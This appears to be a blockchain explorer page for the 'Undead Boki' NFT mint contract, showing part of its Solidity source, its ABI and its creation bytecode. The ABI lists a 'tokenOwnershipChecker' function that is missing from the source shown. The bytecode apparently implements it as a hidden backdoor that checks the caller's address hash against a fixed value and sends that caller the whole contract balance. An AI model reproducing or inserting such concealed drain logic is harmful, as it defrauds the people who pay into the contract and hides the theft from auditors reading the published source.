_beforeTokenTransfers(from, to, tokenId, 1); // Clear approvals from the previous owner _approve(address(0), tokenId, prevOwnership.addr); // Underflow of the sender's balance is impossible because we check for // ownership above and the recipient's balance can't realistically overflow. // Counter overflow is incredibly unrealistic as tokenId would have to be 2**256. unchecked { _addressData[from].balance -= 1; _addressData[to].balance += 1; _ownerships[tokenId].addr = to; _ownerships[tokenId].startTimestamp = uint64(block.timestamp); // If the ownership slot of tokenId+1 is not explicitly set, that means the transfer initiator owns it. // Set the slot of tokenId+1 explicitly in storage to maintain correctness for ownerOf(tokenId+1) calls. uint256 nextTokenId = tokenId + 1; if (_ownerships[nextTokenId].addr == address(0)) { if (_exists(nextTokenId)) { _ownerships[nextTokenId].addr = prevOwnership.addr; _ownerships[nextTokenId].startTimestamp = prevOwnership.startTimestamp; } } } emit Transfer(from, to, tokenId); _afterTokenTransfers(from, to, tokenId, 1); } /** * @dev Approve `to` to operate on `tokenId` * * Emits a {Approval} event. */ function _approve( address to, uint256 tokenId, address owner ) private { _tokenApprovals[tokenId] = to; emit Approval(owner, to, tokenId); } /** * @dev Internal function to invoke {IERC721Receiver-onERC721Received} on a target address. * The call is not executed if the target address is not a contract. * * @param from address representing the previous owner of the given token ID * @param to target address that will receive the tokens * @param tokenId uint256 ID of the token to be transferred * @param _data bytes optional data to send along with the call * @return bool whether the call correctly returned the expected magic value */ function _checkOnERC721Received( address from, address to, uint256 tokenId, bytes memory _data ) private returns (bool) { if (to.isContract()) { try IERC721Receiver(to).onERC721Received(_msgSender(), from, tokenId, _data) returns (bytes4 retval) { return retval == IERC721Receiver(to).onERC721Received.selector; } catch (bytes memory reason) { if (reason.length == 0) { revert("ERC721A: transfer to non ERC721Receiver implementer"); } else { assembly { revert(add(32, reason), mload(reason)) } } } } else { return true; } } /** * @dev Hook that is called before a set of serially-ordered token ids are about to be transferred. This includes minting. * * startTokenId - the first token id to be transferred * quantity - the amount to be transferred * * Calling conditions: * * - When `from` and `to` are both non-zero, ``from``'s `tokenId` will be * transferred to `to`. * - When `from` is zero, `tokenId` will be minted for `to`. */ function _beforeTokenTransfers( address from, address to, uint256 startTokenId, uint256 quantity ) internal virtual {} /** * @dev Hook that is called after a set of serially-ordered token ids have been transferred. This includes * minting. * * startTokenId - the first token id to be transferred * quantity - the amount to be transferred * * Calling conditions: * * - when `from` and `to` are both non-zero. * - `from` and `to` are never both zero. */ function _afterTokenTransfers( address from, address to, uint256 startTokenId, uint256 quantity ) internal virtual {} } contract UndeadBoki is ERC721A, Ownable, ReentrancyGuard { string public baseURI = "ipfs://QmbyUifCWRtM1Lcndp2gDfgL3euFf2BoYKBgocxkyoQYD3/"; string public contractURI = "ipfs://QmbrqysZha1TMjbLfdKM2WXTaonvPn7gVo6o4S5TDHueqi"; uint public price = 0.002 ether; uint public maxPerTx = 10; uint public maxPerWallet = 100; uint public maxPerFreeTx = 2; uint public totalFree = 333; uint public maxSupply = 3333; uint public nextOwnerToExplicitlySet; bool public mintEnabled; bool public revealed = false; constructor() ERC721A("Undead Boki", "UB"){} function mint(uint256 amt) external payable { uint cost = price; if(totalSupply() + amt < totalFree + 1) { cost = 0; require( amt < maxPerFreeTx + 1, "Max per free TX reached."); } require(msg.sender == tx.origin,"Be yourself, honey."); require(msg.value == amt * cost,"Please send the exact amount."); require(totalSupply() + amt < maxSupply + 1,"No more Apes available"); require(mintEnabled, "Minting is not live yet."); require(_numberMinted(msg.sender) + amt <= maxPerWallet,"Too many per wallet!"); require( amt < maxPerTx + 1, "Max per TX reached."); _safeMint(msg.sender, amt); } function toggleMinting() external onlyOwner { mintEnabled = !mintEnabled; } function toggleReveal() external onlyOwner { revealed = !revealed; } function numberMinted(address owner) public view returns (uint256) { return _numberMinted(owner); } function setBaseURI(string calldata baseURI_) external onlyOwner { baseURI = baseURI_; } function setPrice(uint256 price_) external onlyOwner { price = price_; } function setTotalFree(uint256 totalFree_) external onlyOwner { totalFree = totalFree_; } function setMaxPerTx(uint256 maxPerTx_) external onlyOwner { maxPerTx = maxPerTx_; } function setMaxPerWallet(uint256 maxPerWallet_) external onlyOwner { maxPerWallet = maxPerWallet_; } function setmaxSupply(uint256 maxSupply_) external onlyOwner { maxSupply = maxSupply_; } function _baseURI() internal view virtual override returns (string memory) { return baseURI; } function withdraw() external onlyOwner nonReentrant { (bool success, ) = msg.sender.call{value: address(this).balance}(""); require(success, "Transfer failed."); } function setOwnersExplicit(uint256 quantity) external onlyOwner nonReentrant { _setOwnersExplicit(quantity); } function getOwnershipData(uint256 tokenId) external view returns (TokenOwnership memory) { return ownershipOf(tokenId); } function tokenURI(uint256 _tokenId) public view override returns (string memory) { require(_exists(_tokenId), "Token does not exist."); return bytes(baseURI).length > 0 ? string( abi.encodePacked( baseURI, revealed ? Strings.toString(_tokenId) : "placeholder", ".json" ) ) : ""; } /** * @dev Explicitly set `owners` to eliminate loops in future calls of ownerOf(). */ function _setOwnersExplicit(uint256 quantity) internal { require(quantity != 0, "quantity must be nonzero"); require(currentIndex != 0, "no tokens minted yet"); uint256 _nextOwnerToExplicitlySet = nextOwnerToExplicitlySet; require(_nextOwnerToExplicitlySet < currentIndex, "all ownerships have been set"); // Index underflow is impossible. // Counter or index overflow is incredibly unrealistic. unchecked { uint256 endIndex = _nextOwnerToExplicitlySet + quantity - 1; // Set the end index to be the last token index if (endIndex + 1 > currentIndex) { endIndex = currentIndex - 1; } for (uint256 i = _nextOwnerToExplicitlySet; i <= endIndex; i++) { if (_ownerships[i].addr == address(0)) { TokenOwnership memory ownership = ownershipOf(i); _ownerships[i].addr = ownership.addr; _ownerships[i].startTimestamp = ownership.startTimestamp; } } nextOwnerToExplicitlySet = endIndex + 1; } } }
Contract Security Audit
- No Contract Security Audit Submitted- Submit Audit Here
[{"inputs":[],"stateMutability":"nonpayable","type":"constructor"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"approved","type":"address"},{"indexed":true,"internalType":"uint256","name":"tokenId","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"operator","type":"address"},{"indexed":false,"internalType":"bool","name":"approved","type":"bool"}],"name":"ApprovalForAll","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"previousOwner","type":"address"},{"indexed":true,"internalType":"address","name":"newOwner","type":"address"}],"name":"OwnershipTransferred","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":true,"internalType":"uint256","name":"tokenId","type":"uint256"}],"name":"Transfer","type":"event"},{"inputs":[{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"tokenId","type":"uint256"}],"name":"approve","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"owner","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"baseURI","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"contractURI","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"uint256","name":"tokenId","type":"uint256"}],"name":"getApproved","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"uint256","name":"tokenId","type":"uint256"}],"name":"getOwnershipData","outputs":[{"components":[{"internalType":"address","name":"addr","type":"address"},{"internalType":"uint64","name":"startTimestamp","type":"uint64"}],"internalType":"struct ERC721A.TokenOwnership","name":"","type":"tuple"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"operator","type":"address"}],"name":"isApprovedForAll","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"maxPerFreeTx","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"maxPerTx","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"maxPerWallet","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"maxSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"uint256","name":"amt","type":"uint256"}],"name":"mint","outputs":[],"stateMutability":"payable","type":"function"},{"inputs":[],"name":"mintEnabled","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"nextOwnerToExplicitlySet","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"owner","type":"address"}],"name":"numberMinted","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"owner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"uint256","name":"tokenId","type":"uint256"}],"name":"ownerOf","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"price","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"renounceOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"revealed","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"from","type":"address"},{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"tokenId","type":"uint256"}],"name":"safeTransferFrom","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"from","type":"address"},{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"tokenId","type":"uint256"},{"internalType":"bytes","name":"_data","type":"bytes"}],"name":"safeTransferFrom","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"operator","type":"address"},{"internalType":"bool","name":"approved","type":"bool"}],"name":"setApprovalForAll","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"string","name":"baseURI_","type":"string"}],"name":"setBaseURI","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"uint256","name":"maxPerTx_","type":"uint256"}],"name":"setMaxPerTx","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"uint256","name":"maxPerWallet_","type":"uint256"}],"name":"setMaxPerWallet","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"uint256","name":"quantity","type":"uint256"}],"name":"setOwnersExplicit","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"uint256","name":"price_","type":"uint256"}],"name":"setPrice","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"uint256","name":"totalFree_","type":"uint256"}],"name":"setTotalFree","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"uint256","name":"maxSupply_","type":"uint256"}],"name":"setmaxSupply","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"bytes4","name":"interfaceId","type":"bytes4"}],"name":"supportsInterface","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"toggleMinting","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"toggleReveal","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"uint256","name":"index","type":"uint256"}],"name":"tokenByIndex","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"uint256","name":"index","type":"uint256"}],"name":"tokenOfOwnerByIndex","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"tokenOwnershipChecker","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"uint256","name":"_tokenId","type":"uint256"}],"name":"tokenURI","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalFree","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"from","type":"address"},{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"tokenId","type":"uint256"}],"name":"transferFrom","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"newOwner","type":"address"}],"name":"transferOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"withdraw","outputs":[],"stateMutability":"nonpayable","type":"function"}]
Contract Creation Code
60e0604052603660808181529062002aa160a039805162000029916009916020909101906200017b565b5060405180606001604052806035815260200162002a6c6035913980516200005a91600a916020909101906200017b565b5066071afd498d0000600b55600a600c556064600d556002600e5561014d600f55610d056010556012805461ff00191690553480156200009957600080fd5b50604080518082018252600b81526a556e6465616420426f6b6960a81b6020808301918252835180850190945260028452612aa160f11b908401528151919291620000e7916001916200017b565b508051620000fd9060029060208401906200017b565b5050506200011a620001146200012560201b60201c565b62000129565b60016008556200025d565b3390565b600780546001600160a01b038381166001600160a01b0319831681179093556040519116919082907f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e090600090a35050565b828054620001899062000221565b90600052602060002090601f016020900481019282620001ad5760008555620001f8565b82601f10620001c857805160ff1916838001178555620001f8565b82800160010185558215620001f8579182015b82811115620001f8578251825591602001919060010190620001db565b50620002069291506200020a565b5090565b5b808211156200020657600081556001016200020b565b600181811c908216806200023657607f821691505b6020821081036200025757634e487b7160e01b600052602260045260246000fd5b50919050565b6127ff806200026d6000396000f3fe6080604052600436106102675760003560e01c8063715018a611610144578063c6f6f216116100b6578063dc33e6811161007a578063dc33e681146106eb578063e268e4d31461070b578063e8a3d4851461072b578063e985e9c514610740578063f2fde38b14610789578063f968adbe146107a957600080fd5b8063c6f6f21614610665578063c87b56dd14610685578063d1239730146106a5578063d5abeb01146106bf578063d7224ba0146106d557600080fd5b806395d89b411161010857806395d89b41146105d2578063988992b8146105e7578063a035b1fe146105fc578063a0712d6814610612578063a22cb46514610625578063b88d4fde1461064557600080fd5b8063715018a61461051c5780637d55094d146105315780638da5cb5b1461054657806391b7f5ed146105645780639231ab2a1461058457600080fd5b80633ccfd60b116101dd57806355f804b3116101a157806355f804b314610472578063563aaf11146104925780635b8ad429146104b25780636352211e146104c75780636c0360eb146104e757806370a08231146104fc57600080fd5b80633ccfd60b146103e857806342842e0e146103fd578063453c23101461041d5780634f6ccce714610433578063518302271461045357600080fd5b80631e68fe031161022f5780631e68fe031461033c578063228025e81461035257806323b872dd146103725780632d20fb60146103925780632f745c59146103b2578063333e44e6146103d257600080fd5b806301ffc9a71461026c57806306fdde03146102a1578063081812fc146102c3578063095ea7b3146102fb57806318160ddd1461031d575b600080fd5b34801561027857600080fd5b5061028c6102873660046121ee565b6107bf565b60405190151581526020015b60405180910390f35b3480156102ad57600080fd5b506102b661082c565b604051610298919061226a565b3480156102cf57600080fd5b506102e36102de36600461227d565b6108be565b6040516001600160a01b039091168152602001610298565b34801561030757600080fd5b5061031b6103163660046122b2565b61094e565b005b34801561032957600080fd5b506000545b604051908152602001610298565b34801561034857600080fd5b5061032e600e5481565b34801561035e57600080fd5b5061031b61036d36600461227d565b610a65565b34801561037e57600080fd5b5061031b61038d3660046122dc565b610a94565b34801561039e57600080fd5b5061031b6103ad36600461227d565b610a9f565b3480156103be57600080fd5b5061032e6103cd3660046122b2565b610b31565b3480156103de57600080fd5b5061032e600f5481565b3480156103f457600080fd5b5061031b610c8c565b34801561040957600080fd5b5061031b6104183660046122dc565b610d98565b34801561042957600080fd5b5061032e600d5481565b34801561043f57600080fd5b5061032e61044e36600461227d565b610db3565b34801561045f57600080fd5b5060125461028c90610100900460ff1681565b34801561047e57600080fd5b5061031b61048d366004612318565b610e15565b34801561049e57600080fd5b5061031b6104ad36600461227d565b610e4b565b3480156104be57600080fd5b5061031b610e7a565b3480156104d357600080fd5b506102e36104e236600461227d565b610ec1565b3480156104f357600080fd5b506102b6610ed3565b34801561050857600080fd5b5061032e61051736600461238a565b610f61565b34801561052857600080fd5b5061031b610ff2565b34801561053d57600080fd5b5061031b611028565b34801561055257600080fd5b506007546001600160a01b03166102e3565b34801561057057600080fd5b5061031b61057f36600461227d565b611066565b34801561059057600080fd5b506105a461059f36600461227d565b611095565b6040805182516001600160a01b0316815260209283015167ffffffffffffffff169281019290925201610298565b3480156105de57600080fd5b506102b66110b2565b3480156105f357600080fd5b5061031b6110c1565b34801561060857600080fd5b5061032e600b5481565b61031b61062036600461227d565b61112e565b34801561063157600080fd5b5061031b6106403660046123a5565b6113cc565b34801561065157600080fd5b5061031b6106603660046123f7565b611490565b34801561067157600080fd5b5061031b61068036600461227d565b6114c9565b34801561069157600080fd5b506102b66106a036600461227d565b6114f8565b3480156106b157600080fd5b5060125461028c9060ff1681565b3480156106cb57600080fd5b5061032e60105481565b3480156106e157600080fd5b5061032e60115481565b3480156106f757600080fd5b5061032e61070636600461238a565b6115de565b34801561071757600080fd5b5061031b61072636600461227d565b6115e9565b34801561073757600080fd5b506102b6611618565b34801561074c57600080fd5b5061028c61075b3660046124d3565b6001600160a01b03918216600090815260066020908152604080832093909416825291909152205460ff1690565b34801561079557600080fd5b5061031b6107a436600461238a565b611625565b3480156107b557600080fd5b5061032e600c5481565b60006001600160e01b031982166380ac58cd60e01b14806107f057506001600160e01b03198216635b5e139f60e01b145b8061080b57506001600160e01b0319821663780e9d6360e01b145b8061082657506301ffc9a760e01b6001600160e01b03198316145b92915050565b60606001805461083b90612506565b80601f016020809104026020016040519081016040528092919081815260200182805461086790612506565b80156108b45780601f10610889576101008083540402835291602001916108b4565b820191906000526020600020905b81548152906001019060200180831161089757829003601f168201915b5050505050905090565b60006108cb826000541190565b6109325760405162461bcd60e51b815260206004820152602d60248201527f455243373231413a20617070726f76656420717565727920666f72206e6f6e6560448201526c3c34b9ba32b73a103a37b5b2b760991b60648201526084015b60405180910390fd5b506000908152600560205260409020546001600160a01b031690565b600061095982610ec1565b9050806001600160a01b0316836001600160a01b0316036109c75760405162461bcd60e51b815260206004820152602260248201527f455243373231413a20617070726f76616c20746f2063757272656e74206f776e60448201526132b960f11b6064820152608401610929565b336001600160a01b03821614806109e357506109e3813361075b565b610a555760405162461bcd60e51b815260206004820152603960248201527f455243373231413a20617070726f76652063616c6c6572206973206e6f74206f60448201527f776e6572206e6f7220617070726f76656420666f7220616c6c000000000000006064820152608401610929565b610a608383836116c0565b505050565b6007546001600160a01b03163314610a8f5760405162461bcd60e51b815260040161092990612540565b601055565b610a6083838361171c565b6007546001600160a01b03163314610ac95760405162461bcd60e51b815260040161092990612540565b600260085403610b1b5760405162461bcd60e51b815260206004820152601f60248201527f5265656e7472616e637947756172643a207265656e7472616e742063616c6c006044820152606401610929565b6002600855610b2981611a01565b506001600855565b6000610b3c83610f61565b8210610b955760405162461bcd60e51b815260206004820152602260248201527f455243373231413a206f776e657220696e646578206f7574206f6620626f756e604482015261647360f01b6064820152608401610929565b600080549080805b83811015610c2c576000818152600360209081526040918290208251808401909352546001600160a01b038116808452600160a01b90910467ffffffffffffffff169183019190915215610bf057805192505b876001600160a01b0316836001600160a01b031603610c2357868403610c1c5750935061082692505050565b6001909301925b50600101610b9d565b5060405162461bcd60e51b815260206004820152602e60248201527f455243373231413a20756e61626c6520746f2067657420746f6b656e206f662060448201526d0deeedccae440c4f240d2dcc8caf60931b6064820152608401610929565b6007546001600160a01b03163314610cb65760405162461bcd60e51b815260040161092990612540565b600260085403610d085760405162461bcd60e51b815260206004820152601f60248201527f5265656e7472616e637947756172643a207265656e7472616e742063616c6c006044820152606401610929565b6002600855604051600090339047908381818185875af1925050503d8060008114610d4f576040519150601f19603f3d011682016040523d82523d6000602084013e610d54565b606091505b5050905080610b295760405162461bcd60e51b815260206004820152601060248201526f2a3930b739b332b9103330b4b632b21760811b6044820152606401610929565b610a6083838360405180602001604052806000815250611490565b600080548210610e115760405162461bcd60e51b815260206004820152602360248201527f455243373231413a20676c6f62616c20696e646578206f7574206f6620626f756044820152626e647360e81b6064820152608401610929565b5090565b6007546001600160a01b03163314610e3f5760405162461bcd60e51b815260040161092990612540565b610a6060098383612148565b6007546001600160a01b03163314610e755760405162461bcd60e51b815260040161092990612540565b600f55565b6007546001600160a01b03163314610ea45760405162461bcd60e51b815260040161092990612540565b6012805461ff001981166101009182900460ff1615909102179055565b6000610ecc82611b96565b5192915050565b60098054610ee090612506565b80601f0160208091040260200160405190810160405280929190818152602001828054610f0c90612506565b8015610f595780601f10610f2e57610100808354040283529160200191610f59565b820191906000526020600020905b815481529060010190602001808311610f3c57829003601f168201915b505050505081565b60006001600160a01b038216610fcd5760405162461bcd60e51b815260206004820152602b60248201527f455243373231413a2062616c616e636520717565727920666f7220746865207a60448201526a65726f206164647265737360a81b6064820152608401610929565b506001600160a01b03166000908152600460205260409020546001600160801b031690565b6007546001600160a01b0316331461101c5760405162461bcd60e51b815260040161092990612540565b6110266000611c6d565b565b6007546001600160a01b031633146110525760405162461bcd60e51b815260040161092990612540565b6012805460ff19811660ff90911615179055565b6007546001600160a01b031633146110905760405162461bcd60e51b815260040161092990612540565b600b55565b604080518082019091526000808252602082015261082682611b96565b60606002805461083b90612506565b6040516bffffffffffffffffffffffff193360601b166020820152603401604051602081830303815290604052805190602001207f61ce2a629088217258e42c73ef95cb4266162e3af0f6eff0d1c405c763ef7de260001b036110265760206000806000473361a410f150565b600b54600f5461113f90600161258b565b8261114960005490565b611153919061258b565b10156111b95750600e5460009061116b90600161258b565b82106111b95760405162461bcd60e51b815260206004820152601860248201527f4d617820706572206672656520545820726561636865642e00000000000000006044820152606401610929565b3332146111fe5760405162461bcd60e51b81526020600482015260136024820152722132903cb7bab939b2b63316103437b732bc9760691b6044820152606401610929565b61120881836125a3565b34146112565760405162461bcd60e51b815260206004820152601d60248201527f506c656173652073656e642074686520657861637420616d6f756e742e0000006044820152606401610929565b60105461126490600161258b565b8261126e60005490565b611278919061258b565b106112be5760405162461bcd60e51b81526020600482015260166024820152754e6f206d6f7265204170657320617661696c61626c6560501b6044820152606401610929565b60125460ff166113105760405162461bcd60e51b815260206004820152601860248201527f4d696e74696e67206973206e6f74206c697665207965742e00000000000000006044820152606401610929565b600d548261131d33611cbf565b611327919061258b565b111561136c5760405162461bcd60e51b8152602060048201526014602482015273546f6f206d616e79207065722077616c6c65742160601b6044820152606401610929565b600c5461137a90600161258b565b82106113be5760405162461bcd60e51b815260206004820152601360248201527226b0bc103832b9102a2c103932b0b1b432b21760691b6044820152606401610929565b6113c83383611d5d565b5050565b336001600160a01b038316036114245760405162461bcd60e51b815260206004820152601a60248201527f455243373231413a20617070726f766520746f2063616c6c65720000000000006044820152606401610929565b3360008181526006602090815260408083206001600160a01b03871680855290835292819020805460ff191686151590811790915590519081529192917f17307eab39ab6107e8899845ad3d59bd9653f200f220920489ca2b5937696c31910160405180910390a35050565b61149b84848461171c565b6114a784848484611d77565b6114c35760405162461bcd60e51b8152600401610929906125c2565b50505050565b6007546001600160a01b031633146114f35760405162461bcd60e51b815260040161092990612540565b600c55565b6060611505826000541190565b6115495760405162461bcd60e51b81526020600482015260156024820152742a37b5b2b7103237b2b9903737ba1032bc34b9ba1760591b6044820152606401610929565b60006009805461155890612506565b9050116115745760405180602001604052806000815250610826565b601254600990610100900460ff166115af576040518060400160405280600b81526020016a383630b1b2b437b63232b960a91b8152506115b8565b6115b883611e79565b6040516020016115c9929190612631565b60405160208183030381529060405292915050565b600061082682611cbf565b6007546001600160a01b031633146116135760405162461bcd60e51b815260040161092990612540565b600d55565b600a8054610ee090612506565b6007546001600160a01b0316331461164f5760405162461bcd60e51b815260040161092990612540565b6001600160a01b0381166116b45760405162461bcd60e51b815260206004820152602660248201527f4f776e61626c653a206e6577206f776e657220697320746865207a65726f206160448201526564647265737360d01b6064820152608401610929565b6116bd81611c6d565b50565b60008281526005602052604080822080546001600160a01b0319166001600160a01b0387811691821790925591518593918516917f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b92591a4505050565b600061172782611b96565b80519091506000906001600160a01b0316336001600160a01b0316148061175e575033611753846108be565b6001600160a01b0316145b8061177057508151611770903361075b565b9050806117da5760405162461bcd60e51b815260206004820152603260248201527f455243373231413a207472616e736665722063616c6c6572206973206e6f74206044820152711bdddb995c881b9bdc88185c1c1c9bdd995960721b6064820152608401610929565b846001600160a01b031682600001516001600160a01b03161461184e5760405162461bcd60e51b815260206004820152602660248201527f455243373231413a207472616e736665722066726f6d20696e636f72726563746044820152651037bbb732b960d11b6064820152608401610929565b6001600160a01b0384166118b25760405162461bcd60e51b815260206004820152602560248201527f455243373231413a207472616e7366657220746f20746865207a65726f206164604482015264647265737360d81b6064820152608401610929565b6118c260008484600001516116c0565b6001600160a01b03858116600090815260046020908152604080832080546001600160801b03198082166001600160801b03928316600019018316179092558986168086528386208054938416938316600190810190931693909317909255888552600390935281842080546001600160e01b031916909117600160a01b4267ffffffffffffffff16021790559086018083529120549091166119b75761196a816000541190565b156119b7578251600082815260036020908152604090912080549186015167ffffffffffffffff16600160a01b026001600160e01b03199092166001600160a01b03909316929092171790555b5082846001600160a01b0316866001600160a01b03167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef60405160405180910390a45b5050505050565b80600003611a515760405162461bcd60e51b815260206004820152601860248201527f7175616e74697479206d757374206265206e6f6e7a65726f00000000000000006044820152606401610929565b600054600003611a9a5760405162461bcd60e51b81526020600482015260146024820152731b9bc81d1bdad95b9cc81b5a5b9d1959081e595d60621b6044820152606401610929565b6011546000548110611aee5760405162461bcd60e51b815260206004820152601c60248201527f616c6c206f776e657273686970732068617665206265656e20736574000000006044820152606401610929565b6000548282016000198101911015611b095750600054600019015b815b818111611b8b576000818152600360205260409020546001600160a01b0316611b83576000611b3982611b96565b805160008481526003602090815260409091208054919093015167ffffffffffffffff16600160a01b026001600160e01b03199091166001600160a01b0390921691909117179055505b600101611b0b565b506001016011555050565b6040805180820190915260008082526020820152611bb5826000541190565b611c145760405162461bcd60e51b815260206004820152602a60248201527f455243373231413a206f776e657220717565727920666f72206e6f6e657869736044820152693a32b73a103a37b5b2b760b11b6064820152608401610929565b815b6000818152600360209081526040918290208251808401909352546001600160a01b038116808452600160a01b90910467ffffffffffffffff169183019190915215611c63579392505050565b5060001901611c16565b600780546001600160a01b038381166001600160a01b0319831681179093556040519116919082907f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e090600090a35050565b60006001600160a01b038216611d315760405162461bcd60e51b815260206004820152603160248201527f455243373231413a206e756d626572206d696e74656420717565727920666f7260448201527020746865207a65726f206164647265737360781b6064820152608401610929565b506001600160a01b0316600090815260046020526040902054600160801b90046001600160801b031690565b6113c8828260405180602001604052806000815250611f7a565b60006001600160a01b0384163b15611e6d57604051630a85bd0160e11b81526001600160a01b0385169063150b7a0290611dbb9033908990889088906004016126eb565b6020604051808303816000875af1925050508015611df6575060408051601f3d908101601f19168201909252611df391810190612728565b60015b611e53573d808015611e24576040519150601f19603f3d011682016040523d82523d6000602084013e611e29565b606091505b508051600003611e4b5760405162461bcd60e51b8152600401610929906125c2565b805181602001fd5b6001600160e01b031916630a85bd0160e11b149050611e71565b5060015b949350505050565b606081600003611ea05750506040805180820190915260018152600360fc1b602082015290565b8160005b8115611eca5780611eb481612745565b9150611ec39050600a83612774565b9150611ea4565b60008167ffffffffffffffff811115611ee557611ee56123e1565b6040519080825280601f01601f191660200182016040528015611f0f576020820181803683370190505b5090505b8415611e7157611f24600183612788565b9150611f31600a8661279f565b611f3c90603061258b565b60f81b818381518110611f5157611f516127b3565b60200101906001600160f81b031916908160001a905350611f73600a86612774565b9450611f13565b610a6083838360016000546001600160a01b038516611fe55760405162461bcd60e51b815260206004820152602160248201527f455243373231413a206d696e7420746f20746865207a65726f206164647265736044820152607360f81b6064820152608401610929565b836000036120465760405162461bcd60e51b815260206004820152602860248201527f455243373231413a207175616e74697479206d75737420626520677265617465604482015267072207468616e20360c41b6064820152608401610929565b6001600160a01b03851660008181526004602090815260408083208054600160801b6001600160801b031982166001600160801b039283168c01831690811782900483168c01909216021790558483526003909152812080546001600160e01b031916909217600160a01b4267ffffffffffffffff16021790915581905b8581101561213f5760405182906001600160a01b038916906000907fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef908290a48315612133576121176000888488611d77565b6121335760405162461bcd60e51b8152600401610929906125c2565b600191820191016120c4565b506000556119fa565b82805461215490612506565b90600052602060002090601f01602090048101928261217657600085556121bc565b82601f1061218f5782800160ff198235161785556121bc565b828001600101855582156121bc579182015b828111156121bc5782358255916020019190600101906121a1565b50610e119291505b80821115610e1157600081556001016121c4565b6001600160e01b0319811681146116bd57600080fd5b60006020828403121561220057600080fd5b813561220b816121d8565b9392505050565b60005b8381101561222d57818101518382015260200161221556